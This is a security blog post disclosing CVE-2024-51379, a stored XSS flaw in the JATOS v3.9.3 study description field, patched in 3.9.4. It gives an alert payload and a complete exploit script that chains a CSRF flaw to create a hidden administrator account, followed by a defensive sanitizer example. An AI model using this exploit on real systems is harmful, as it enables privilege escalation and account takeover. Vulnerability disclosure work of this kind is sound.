CVE-2024-51379 | JATOS v3.9.3 Stored XSS | Description Component
Introduction to CVE-2024-51379
CVE-2024-51379 describes a critical security vulnerability in JATOS that poses significant risks to user data and system integrity. This Stored XSS (Cross-Site Scripting) flaw lets an attacker execute JavaScript in another user's browser, leading to unauthorized actions performed with that user's privileges and, ultimately, account takeover.
What is JATOS
JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.
The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.
One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.
JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. When I spoke with Kristian, he explained that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It's an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.
I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.4.
Exploitation Phase
Now that you clearly understand what JATOS is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to gain elevated privileges.
Simple Exploitation
To exploit the Stored XSS vulnerability in the description component of the study section, simply input <script>alert(1)</script> as the description. Although the description field is designed to accept Markdown, it should not permit the execution of JavaScript. This matters because if a study containing such a payload is shared with an admin, the admin only has to open the description to unintentionally execute JavaScript written by a regular user in their own browser, with their own session.
A strong recommendation to address this issue is to sanitize the output rather than the input. Once the Markdown has been converted into fully rendered HTML, the appropriate XSS filter can be applied to that HTML to remove dangerous or malicious content before it is sent to the browser.
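To make the recommendation concrete, here is an added example (not JATOS code) of the output-side step: an allowlist sanitizer run over the HTML that the Markdown renderer produced for a description. It assumes the Markdown conversion has already happened (most renderers pass raw HTML such as a script tag straight through) and it keeps only harmless tags and attributes, escaping everything else instead of stripping it so that fragments cannot reassemble into a tag.

```javascript
// Added example, not code from JATOS: allowlist-based sanitizer applied to
// the HTML rendered from a study description, before it reaches any browser.
const ALLOWED_TAGS = new Set(['p', 'br', 'em', 'strong', 'ul', 'ol', 'li',
                              'a', 'code', 'pre', 'h1', 'h2', 'h3']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']) };   // no on* handlers, no style
const SAFE_URL = /^(https?:|mailto:|\/|#)/i;                 // rejects javascript: and data:

function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Rebuild the attribute list of an allowed tag from scratch, keeping only
// allowlisted names and, for href, only URL schemes we consider safe.
function sanitizeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return '';
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let out = '';
  let m;
  while ((m = attrRe.exec(rawAttrs)) !== null) {
    const name = m[1].toLowerCase();
    const value = (m[2] ?? m[3] ?? m[4] ?? '').trim();
    if (!allowed.has(name)) continue;                       // drops onclick, onerror, ...
    if (name === 'href' && !SAFE_URL.test(value)) continue; // drops javascript: URLs
    out += ` ${name}="${escapeHtml(value)}"`;
  }
  return out;
}

// Every well-formed tag is checked against the allowlist; anything else,
// including stray '<' and '>' characters, is escaped rather than removed.
function sanitizeHtml(html) {
  return html.replace(/<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^<>]*)>|[<>]/g,
    (whole, slash, name, attrs) => {
      if (name === undefined) return escapeHtml(whole);     // lone '<' or '>'
      const tag = name.toLowerCase();
      if (!ALLOWED_TAGS.has(tag)) return escapeHtml(whole); // e.g. <script>, <iframe>
      if (slash) return `</${tag}>`;
      return `<${tag}${sanitizeAttrs(tag, attrs)}>`;
    });
}

// Constructed sample: a description whose rendered HTML carries the payload from this article.
const rendered = '<p>Welcome to my study <script>alert(1)</script></p>';
console.log(sanitizeHtml(rendered)); // the script tag survives only as visible text
```

A real deployment would use a maintained sanitizer library rather than this hand-rolled one; the point shown is where the filtering sits (after rendering) and that it allowlists rather than denylists.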
Attacker Scenario Exploiting the Vulnerability
This vulnerability could be exploited in conjunction with CVE #3 | JATOS v3.9.3 CSRF | Admin Account Creation, enabling a regular user to create a new admin account.
To achieve this, the user would first create a new study, add the administrator, and then include the following JavaScript snippet in the description section:
<script>
function postRequestInIframe() {
  var form = document.createElement('form');
  form.method = 'POST';
  form.action = 'http://localhost:9000/jatos/user';
  form.target = 'postIframe';

  var usernameInput = document.createElement('input');
  usernameInput.type = 'hidden';
  usernameInput.name = 'username';
  usernameInput.value = 'Hacked';
  form.appendChild(usernameInput);

  var nameInput = document.createElement('input');
  nameInput.type = 'hidden';
  nameInput.name = 'name';
  nameInput.value = 'name123';
  form.appendChild(nameInput);

  var emailInput = document.createElement('input');
  emailInput.type = 'hidden';
  emailInput.name = 'email';
  emailInput.value = 'email@gmail.com';
  form.appendChild(emailInput);

  var authByLdapInput = document.createElement('input');
  authByLdapInput.type = 'hidden';
  authByLdapInput.name = 'authByLdap';
  authByLdapInput.value = 'false';
  form.appendChild(authByLdapInput);

  var passwordInput = document.createElement('input');
  passwordInput.type = 'hidden';
  passwordInput.name = 'password';
  passwordInput.value = 'password123';
  form.appendChild(passwordInput);

  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
}

// Trigger the first request immediately
postRequestInIframe();

// Wait 3 seconds and trigger the second request
setTimeout(function postRequestInIframeaftertimeout() {
  var form = document.createElement('form');
  form.method = 'POST';
  form.action = 'http://localhost:9000/jatos/user/hacked/properties/role?role=ADMIN&value=true';
  form.target = 'postIframetimeout';
  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
}, 3000); // Executes after 3000ms (3 seconds)
</script>
When the administrator opens the description section of this study, two actions occur in their browser, using their authenticated session: first, a CSRF request is sent to create a new user; second, after the delay, another CSRF request is sent to grant that user administrative privileges.
This would enable the attacker to log in with the new account as an administrator, compromising the confidentiality, integrity, and availability of the application, particularly if any studies are removed.
Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.